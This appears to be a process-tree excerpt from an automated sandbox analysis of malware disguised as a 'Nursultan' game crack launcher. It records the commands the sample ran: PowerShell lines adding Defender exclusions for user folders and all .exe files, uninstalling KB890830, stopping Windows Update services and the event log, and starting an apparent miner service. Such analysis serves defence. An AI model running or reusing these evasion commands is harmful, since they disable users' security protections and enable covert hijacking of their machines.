        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        31⤵
        Adds Run key to start application
        
        PID:2460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2572
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        32⤵
        
        PID:2568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2960
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        32⤵
        
        PID:2676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        32⤵
        
        PID:1992
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        32⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:320
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        33⤵
        
        PID:2688
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        32⤵
        Adds Run key to start application
        
        PID:1464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2700
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        33⤵
        
        PID:1996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        33⤵
        
        PID:1404
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        33⤵
        
        PID:1536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        33⤵
        
        PID:1776
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        33⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1220
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        34⤵
        
        PID:1284
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        33⤵
        Adds Run key to start application
        
        PID:1340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:292
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        34⤵
        
        PID:2996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2204
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        34⤵
        
        PID:756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        34⤵
        
        PID:1296
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        34⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:564
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        35⤵
        
        PID:288
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        34⤵
        Adds Run key to start application
        
        PID:2576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2304
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        35⤵
        
        PID:2192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        35⤵
        
        PID:2956
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        35⤵
        
        PID:1108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        35⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        35⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2848
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        36⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        35⤵
        Adds Run key to start application
        
        PID:2612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1748
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        36⤵
        
        PID:2928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        36⤵
        
        PID:1760
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        36⤵
        
        PID:1936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1636
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        36⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:296
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        37⤵
        
        PID:1364
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        36⤵
        Adds Run key to start application
        
        PID:2164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:948
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        37⤵
        Drops file in System32 directory
        
        PID:2800
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        38⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        38⤵
        
        PID:2444
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        39⤵
        Drops file in Windows directory
        
        PID:1364
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        38⤵
        Launches sc.exe
        
        PID:868
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        38⤵
        Launches sc.exe
        
        PID:3048
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        38⤵
        Launches sc.exe
        
        PID:2436
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        38⤵
        
        PID:2176
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        38⤵
        
        PID:924
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        38⤵
        Power Settings
        
        PID:1216
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        38⤵
        Power Settings
        
        PID:2248
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        38⤵
        Power Settings
        
        PID:1884
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        38⤵
        Power Settings
        
        PID:1716
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        38⤵
        Launches sc.exe
        
        PID:2620
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        38⤵
        Launches sc.exe
        
        PID:2456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        37⤵
        
        PID:828
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        37⤵
        
        PID:2476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        37⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1776
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        38⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        37⤵
        Adds Run key to start application
        
        PID:1220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2620
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        38⤵
        
        PID:2456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2756
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        38⤵
        
        PID:2016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        38⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2256
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        39⤵
        
        PID:1356
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        38⤵
        Adds Run key to start application
        
        PID:1404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2712
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        39⤵
        
        PID:1876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        39⤵
        
        PID:3000
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        39⤵
        
        PID:2144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        39⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        39⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:3048
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        40⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        39⤵
        Adds Run key to start application
        
        PID:2092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        40⤵
        
        PID:2652
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        40⤵
        
        PID:924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2880
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        40⤵
        
        PID:564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        40⤵
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        40⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2584
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        41⤵
        
        PID:2644
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        40⤵
        Adds Run key to start application
        
        PID:1732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        41⤵
        
        PID:3008
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        41⤵
        
        PID:2716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        41⤵
        
        PID:1496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        41⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2548
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        42⤵
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        41⤵
        Adds Run key to start application
        
        PID:380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        42⤵
        
        PID:3008
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        42⤵
        
        PID:2112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2644
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        42⤵
        
        PID:2688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:580
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        42⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2400
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        43⤵
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        42⤵
        
        PID:2660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        43⤵
        
        PID:1536

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2060
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:580
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:2848
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:320
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  PID:2844
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  PID:1760
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  PID:2868
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:1632
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1532
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:1136
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1924
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1936
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:764
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:2288

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "18802880771927815385450839842045146270679094439-1716710420135189138120429424"
1⤵
PID:2472

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "7280367487735878671154696587003845-119941351-10388703591371193606-560004773"
1⤵
PID:1616

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2276
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  PID:2008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1100
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:2572
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2488
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1368
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2700
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2856
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3044
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2180
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:2804
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:832
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1836

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19422501372005603172-347022593651323394-2118111542-133119355520040121301895149868"
1⤵
PID:2768

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "5074950939869656362129245490596604388-266049446-5012623311520091497-679638572"
1⤵
PID:2900

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "699400029-578810986-1039995971648575405-1779828348-4299561891048641924-1229948865"
1⤵
PID:1072

C:\Windows\system32\taskeng.exe
taskeng.exe {2E05C04B-8A87-4AFD-A009-259AF53C2BFE} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]
1⤵
PID:2524
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:2756
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  PID:2452

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2800
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
